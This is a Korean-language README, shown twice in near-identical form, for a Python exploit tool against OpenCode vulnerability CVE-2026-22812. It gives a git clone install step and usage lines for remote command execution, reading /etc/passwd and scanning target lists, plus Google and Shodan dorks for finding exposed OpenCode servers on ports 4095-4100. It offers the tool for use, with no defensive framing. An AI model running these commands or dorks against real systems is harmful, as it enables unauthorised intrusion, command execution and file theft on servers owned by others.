
Python 도구로, OpenCode의 CVE-2026-22812를 확인하고 악용하며, 명령 실행, 파일 읽기, 포트 4095-4100에서의 다중 대상 스캔을 지원합니다.
OpenCode CVE-2026-22812 익스플로이터 OpenCode 취약점(CVE-2026-22812)을 확인하고 익스플로잇하기 위한 간단한 Python 도구입니다.
설치
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
기본 사용법
# 단일 대상 확인
python rce.py -u http://target:4096 --check
# 명령 실행
python rce.py -u http://target:4096 -c "whoami"
# 파일 읽기
python rce.py -u http://target:4096 --read-file /etc/passwd
# 여러 대상 스캔
python rce.py -l targets.txt --check
# 기타
python rce.py --help
검색 Dork
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
기본 포트: 4095-4100
OpenCode 취약점(CVE-2026-22812)을 확인하고 익스플로잇하기 위한 간단한 Python 도구입니다.
설치:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
기본 사용법
# 단일 대상 확인
python rce.py -u http://target:4096 --check
# 명령 실행
python rce.py -u http://target:4096 -c "whoami"
# 파일 읽기
python rce.py -u http://target:4096 --read-file /etc/passwd
# 여러 대상 스캔
python rce.py -l targets.txt --check
# 기타
검색 Dork:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
기본 포트: 4095-4100